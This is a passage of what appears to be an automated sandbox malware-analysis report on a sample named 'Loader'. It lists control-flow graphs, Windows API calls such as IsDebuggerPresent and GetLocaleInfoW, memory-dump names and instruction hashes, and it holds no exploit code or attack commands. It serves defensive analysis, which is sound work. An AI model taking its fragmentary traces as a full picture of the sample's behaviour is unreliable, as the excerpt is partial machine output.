                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 945e1ab0e27d2df10fccea85db1d7966a586a2ce3b2c87f298ed8a101874f043
                                                                                          • Instruction ID: 8d1a921de090baf55cdab15c99c91ec697ba2d06703b99e22daced73cd18122b
                                                                                          • Opcode Fuzzy Hash: 945e1ab0e27d2df10fccea85db1d7966a586a2ce3b2c87f298ed8a101874f043
                                                                                          • Instruction Fuzzy Hash: B1E08C3A200658ABCF132BA0EC49B997A9CAF01751F114020F608CA060CB309850CB85

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 323 3214c0-32152f call 3332f0 call 323030 328 321560-32156a 323->328 329 321535-321555 call 323030 323->329 331 321597-3215be call 323050 call 323160 328->331 336 32155b 329->336 337 32156f-321592 call 323030 329->337 341 3215d2-32162c call 323330 call 323180 call 323360 call 3233d0 331->341 342 3215c4-3215cd 331->342 336->328 337->331 359 321632 341->359 360 3216e1 341->360 344 3218b5-321903 call 3235b0 call 323600 342->344 362 321637-321643 359->362 361 3216e6-3216ef 360->361 363 321707-32170c 361->363 364 3216f5-321704 361->364 365 321649-3216b1 call 323410 call 3234e0 call 323430 call 323500 call 3233f0 362->365 366 3216dc 362->366 367 321712-3217c0 363->367 368 321717-32175c call 323410 call 323510 call 323430 363->368 364->363 409 3216b7-3216d7 365->409 410 3216bc-3216c5 365->410 366->360 374 321891-3218b0 call 323560 367->374 375 3217c6 367->375 395 321761-32178d call 323500 call 3233f0 368->395 374->344 389 321835-32183c 374->389 378 3217cb-3217d7 375->378 382 32188c 378->382 383 3217dd-321820 call 323410 call 3234e0 call 323430 378->383 382->374 383->389 411 321841-321861 call 323500 call 3233f0 383->411 389->344 412 321793 395->412 413 321798-32179e 395->413 409->362 410->366 420 321867-321887 411->420 421 32186c-321875 411->421 416 3217a1-3217b7 412->416 413->416 416->361 420->378 421->382
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID:
                                                                                          • API String ID: 4218353326-0
                                                                                          • Opcode ID: edc7d33045fcb9f2857879dc306e015d330668fdaec3e5b2d7a46e3f42d15516
                                                                                          • Instruction ID: 1d50badb747688a73498cde1c4713a5a92977ecf1cd72ffc96eb13402a4912e0
                                                                                          • Opcode Fuzzy Hash: edc7d33045fcb9f2857879dc306e015d330668fdaec3e5b2d7a46e3f42d15516
                                                                                          • Instruction Fuzzy Hash: 8AD15774604B548FC725EF39D284A6ABBE0BF58714F108A1DE8878BB91D735F904CB81

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 423 3377f7-337819 424 33792b-337951 423->424 425 33781f-337831 GetCPInfo 423->425 426 337956-33795b 424->426 425->424 427 337837-33783e 425->427 428 337965-33796b 426->428 429 33795d-337963 426->429 430 337840-33784a 427->430 432 337977 428->432 433 33796d-337970 428->433 431 337973-337975 429->431 430->430 434 33784c-33785f 430->434 435 337979-33798b 431->435 432->435 433->431 436 337880-337882 434->436 435->426 439 33798d-33799b call 327191 435->439 437 337861-337868 436->437 438 337884-3378bb call 336ca0 call 336da1 436->438 442 337877-337879 437->442 449 3378c0-3378ee call 336da1 438->449 445 33787b-33787e 442->445 446 33786a-33786c 442->446 445->436 446->445 448 33786e-337876 446->448 448->442 452 3378f0-3378fb 449->452 453 337909-33790c 452->453 454 3378fd-337907 452->454 456 33791a 453->456 457 33790e-337918 453->457 455 33791c-337927 454->455 455->452 458 337929 455->458 456->455 457->455 458->439
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000083,?,00000005,00337678,?), ref: 00337829
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-0
                                                                                          • Opcode ID: f61b9e3a4bead87da1b90efff6c2316f24a8b0abf34ad391ead103812fa12b27
                                                                                          • Instruction ID: ae1e3dafba1b11651e0919336b25d55a78521ab24b9bff164a605932c561f55d
                                                                                          • Opcode Fuzzy Hash: f61b9e3a4bead87da1b90efff6c2316f24a8b0abf34ad391ead103812fa12b27
                                                                                          • Instruction Fuzzy Hash: 125127F190C158AEDB228A28CDC5BE9BBADFB15304F1402E9E589CB142D335AD85CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb305d84cfad88b223dcee95e00df32891c8fc7e9afddce91a69c20297cfba97
                                                                                          • Instruction ID: cf30dbdd6e12d301e266d879fd9750017ef09e83f402c3eefdb93106001ec91a
                                                                                          • Opcode Fuzzy Hash: cb305d84cfad88b223dcee95e00df32891c8fc7e9afddce91a69c20297cfba97
                                                                                          • Instruction Fuzzy Hash: 83419131A0112AAFCB16DF68D4909EDB7B9FF09310F24416AE541E7A40EB31F955DB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a4eecdb4785248ce916a28647901b718f75a0411b1bb8340a62a4dbdc4814a6
                                                                                          • Instruction ID: 3a249a09d75dc7617a6e6bde45f0374fbcd0ca1b67611a0b6a45fd85f71324a5
                                                                                          • Opcode Fuzzy Hash: 0a4eecdb4785248ce916a28647901b718f75a0411b1bb8340a62a4dbdc4814a6
                                                                                          • Instruction Fuzzy Hash: A401B537610215AF9B178F68ECC691637AEFBC5764F658124F9148B1A4DA31E8109BD0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00337635,?,?,00337635,00000220,?,?,?), ref: 003356E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 9b9e0d425897ab93a8a4a8540e553906b36de3ac098938417dfe8b7039af2ae5
                                                                                          • Instruction ID: 82a80066cc9e9ef9c7cbf98b0e0db57df8b2ee937657b8faed27d161730b816c
                                                                                          • Opcode Fuzzy Hash: 9b9e0d425897ab93a8a4a8540e553906b36de3ac098938417dfe8b7039af2ae5
                                                                                          • Instruction Fuzzy Hash: 99E02B31545A2057DB233665DC82F5B768C9F01BE1F522520EC05EA0E0DB50CC0083E4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFree
                                                                                          • String ID:
                                                                                          • API String ID: 771614528-0
                                                                                          • Opcode ID: 16a95583bbaf5034c38c3a71aa68128cbeb64c3b4c4176c8b078b0388fcb725a
                                                                                          • Instruction ID: 05f9bf0833e4003c8b07968af8c1938e6cd91efbd0ac18cb563d18e3fe8330aa
                                                                                          • Opcode Fuzzy Hash: 16a95583bbaf5034c38c3a71aa68128cbeb64c3b4c4176c8b078b0388fcb725a
                                                                                          • Instruction Fuzzy Hash: 74C0127410010CABDB41DF94EC05B4A77ECEB04324F008021FC0CCB300DE75EA408652
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: 02a0be489536ff1ba4a34317ce29aed237b00234f8c4bc8958cc548b207f2455
                                                                                          • Instruction ID: 3bdcea474d066fffc03fca47dd96936221c48bad0244f7d08da7a97c76a3d398
                                                                                          • Opcode Fuzzy Hash: 02a0be489536ff1ba4a34317ce29aed237b00234f8c4bc8958cc548b207f2455
                                                                                          • Instruction Fuzzy Hash: 61D22871E086288FDB66CE28CD407EAB7F9EB45305F1541EAD50DEB240DB78AE858F41
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,0033AB2D,00000002,00000000,?,?,?,0033AB2D,?,00000000), ref: 0033B210
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,0033AB2D,00000002,00000000,?,?,?,0033AB2D,?,00000000), ref: 0033B239
                                                                                          • GetACP.KERNEL32(?,?,0033AB2D,?,00000000), ref: 0033B24E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 75e5bc74e510796ea6d9397a3a44f405881058740a38e44c6f06c35cffa6a143
                                                                                          • Instruction ID: f09f392847186d58496730caf7e05dc80c8f4ff3b5f51dd2d5bade8b5c11f2f7
                                                                                          • Opcode Fuzzy Hash: 75e5bc74e510796ea6d9397a3a44f405881058740a38e44c6f06c35cffa6a143
                                                                                          • Instruction Fuzzy Hash: 3B21A722E00104A6DB368F55C981AABF3A6AF94B54F574A24EB0ADB114E732DD40C750
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0033AAFF
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0033AB3D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0033AB50
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0033AB98
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0033ABB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: aad4ed34b6b8937640fc418f1bd5716332bbbd073c7fa13329e49a27b28839b2
                                                                                          • Instruction ID: 6e8e3c78a983155e02cc1323484678d4ee17ecb08e1dc2ec05e73b2a630c425a
                                                                                          • Opcode Fuzzy Hash: aad4ed34b6b8937640fc418f1bd5716332bbbd073c7fa13329e49a27b28839b2
                                                                                          • Instruction Fuzzy Hash: 34517372A00A19ABDF12DFA5CCC1ABEB7B9FF04700F054569E941EB190EB749940DB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 48d6f57b6ee1e8824939b0848cafb3657513b2c9f968159c9322018781552e0c
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: 6B0239B1E012199FDF15CFA9C9C06AEBBF1FF48314F258269E519EB340D731AA458B90
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033B849
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: 3f349c8d626ddcfd1530559a749e06298f9424b3c5659caa5e4ac6ea99b27781
                                                                                          • Instruction ID: 7e4df040740b1b120c87295b99a65c481f81b9c52139c25a386b1eafcd0ec2ca
                                                                                          • Opcode Fuzzy Hash: 3f349c8d626ddcfd1530559a749e06298f9424b3c5659caa5e4ac6ea99b27781
                                                                                          • Instruction Fuzzy Hash: 3071A1719051689FDF22AF28CCCABAAF7B9EF45300F5541D9E249AB211EB315E849F10
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00329A3F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00329B0B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00329B24
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00329B2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 1115dd5648234f72b9b65155925bfacc83765900ad2d0dcec611b4a2bbf427e8
                                                                                          • Instruction ID: 31a72b661b3766789a40f01430f1e21cfe9944fd0521edee2eb6d5963ad5d7a1
                                                                                          • Opcode Fuzzy Hash: 1115dd5648234f72b9b65155925bfacc83765900ad2d0dcec611b4a2bbf427e8
                                                                                          • Instruction Fuzzy Hash: 88310A75D01228DBDF61EF64D9497CDBBB8BF08700F1041EAE40CAB250EB749A848F45
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0032A307
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0032A316
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0032A31F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0032A32C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 9aed879b4f85cb294332b1b0ce205cc6b4cb2c73b29d28e4b8d92235567ea3e2
                                                                                          • Instruction ID: 8072c1c4ffaee046f2247faf683d345c0006d680c51fa4ff66ed92939a33d229
                                                                                          • Opcode Fuzzy Hash: 9aed879b4f85cb294332b1b0ce205cc6b4cb2c73b29d28e4b8d92235567ea3e2
                                                                                          • Instruction Fuzzy Hash: F0F0AF78C0020CEBCF05DBB4CA4898EBBF8FF1D300B914995E412EA110EB30AB449B50
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033AD44
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033AD8E
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033AE54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 661929714-0
                                                                                          • Opcode ID: c188e7461cff10e4cc5a5b98ac4b39ac7f34951da3c44be37be7ddc8b3f7bb73
                                                                                          • Instruction ID: b76d1166c14d3a5918dcdd007d05dae55924e11386e99945b41af8b7d27da2e7
                                                                                          • Opcode Fuzzy Hash: c188e7461cff10e4cc5a5b98ac4b39ac7f34951da3c44be37be7ddc8b3f7bb73
                                                                                          • Instruction Fuzzy Hash: 7D61B2B1910A079FDB2A9F24CCC2BBAB7A8FF04300F118179ED45CA581E738D990DB55
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00331B18
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00331B22
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00331B2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
